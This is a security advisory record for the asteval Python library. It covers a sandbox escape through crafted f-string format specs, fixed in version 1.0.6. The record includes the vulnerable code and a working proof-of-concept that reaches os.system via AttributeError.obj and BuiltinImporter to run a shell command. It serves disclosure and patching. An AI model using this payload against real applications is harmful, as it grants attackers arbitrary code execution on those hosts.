{"id":"PYSEC-2026-1195","summary":"ASTEVAL Allows Maliciously Crafted Format Strings to Lead to Sandbox Escape","details":"### Summary\nIf an attacker can control the input to the `asteval` library, they can bypass asteval's restrictions and execute arbitrary Python code in the context of the application using the library.\n\n### Details\nThe vulnerability is rooted in how `asteval` performs handling of `FormattedValue` AST nodes. In particular, the [`on_formattedvalue`](https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507) value uses the [dangerous format method of the str class](https://lucumr.pocoo.org/2016/12/29/careful-with-str-format/), as shown in the vulnerable code snippet below:\n\n```py\n    def on_formattedvalue(self, node): # ('value', 'conversion', 'format_spec')\n        \"formatting used in f-strings\"\n        val = self.run(node.value)\n        fstring_converters = {115: str, 114: repr, 97: ascii}\n        if node.conversion in fstring_converters:\n            val = fstring_converters[node.conversion](val)\n        fmt = '{__fstring__}'\n        if node.format_spec is not None:\n            fmt = f'{{__fstring__:{self.run(node.format_spec)}}}'\n        return fmt.format(__fstring__=val)\n```\n\nThe code above allows an attacker to manipulate the value of the string used in the dangerous call `fmt.format(__fstring__=val)`. This vulnerability can be exploited to access protected attributes by intentionally triggering an `AttributeError` exception. The attacker can then catch the exception and use its `obj` attribute to gain arbitrary access to sensitive or protected object properties.\n\n### PoC\nThe following proof-of-concept (PoC) demonstrates how this vulnerability can be exploited to execute the `whoami` command on the host machine:\n\n```py\nfrom asteval import Interpreter\naeval = Interpreter()\ncode = \"\"\"\n# def lender():\n#     ga\n    \ndef pwn():\n    try:\n        f\"{dict.mro()[1]:'\\\\x7B__fstring__.__getattribute__.s\\\\x7D'}\"\n    except Exception as ga:\n        ga = ga.obj\n        sub = ga(dict.mro()[1],\"__subclasses__\")()\n        importer = None\n        for i in sub:\n            if \"BuiltinImporter\" in str(i):\n                importer = i.load_module\n                break\n        os = importer(\"os\")\n        os.system(\"whoami\")\n\n# pre commit cfb57f0beebe0dc0520a1fbabc35e66060c7ea71, it was required to modify the AST to make this work using the code below\n# pwn.body[0].handlers[0].name = lender.body[0].value # need to make it an identifier so node_assign works\n        \npwn()\n\"\"\"\naeval(code)\n\n```","aliases":["CVE-2025-24359","GHSA-3wwr-3g9f-9gc7"],"modified":"2026-07-07T17:46:37.985744693Z","published":"2026-07-07T14:34:49.119921Z","references":[{"type":"WEB","url":"https://github.com/lmfit/asteval/security/advisories/GHSA-3wwr-3g9f-9gc7"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-24359"},{"type":"WEB","url":"https://github.com/lmfit/asteval/commit/45bb47533f7abb5479618ae7f6a809215700dcb2"},{"type":"PACKAGE","url":"https://github.com/lmfit/asteval"},{"type":"WEB","url":"https://github.com/lmfit/asteval/blob/cfb57f0beebe0dc0520a1fbabc35e66060c7ea71/asteval/asteval.py#L507"},{"type":"WEB","url":"https://lucumr.pocoo.org/2016/12/29/careful-with-str-format"},{"type":"PACKAGE","url":"https://pypi.org/project/asteval"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-3wwr-3g9f-9gc7"}],"affected":[{"package":{"name":"asteval","ecosystem":"PyPI","purl":"pkg:pypi/asteval"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.0.6"}]}],"versions":["0.9","0.9.1","0.9.10","0.9.11","0.9.12","0.9.13","0.9.14","0.9.15","0.9.16","0.9.17","0.9.18","0.9.19","0.9.2","0.9.20","0.9.21","0.9.22","0.9.23","0.9.24","0.9.25","0.9.26","0.9.27","0.9.28","0.9.29","0.9.3","0.9.30","0.9.31","0.9.32","0.9.33","0.9.4","0.9.5","0.9.6","0.9.7","0.9.8","0.9.9","1.0.0","1.0.1","1.0.2","1.0.3","1.0.4","1.0.5"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/asteval/PYSEC-2026-1195.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}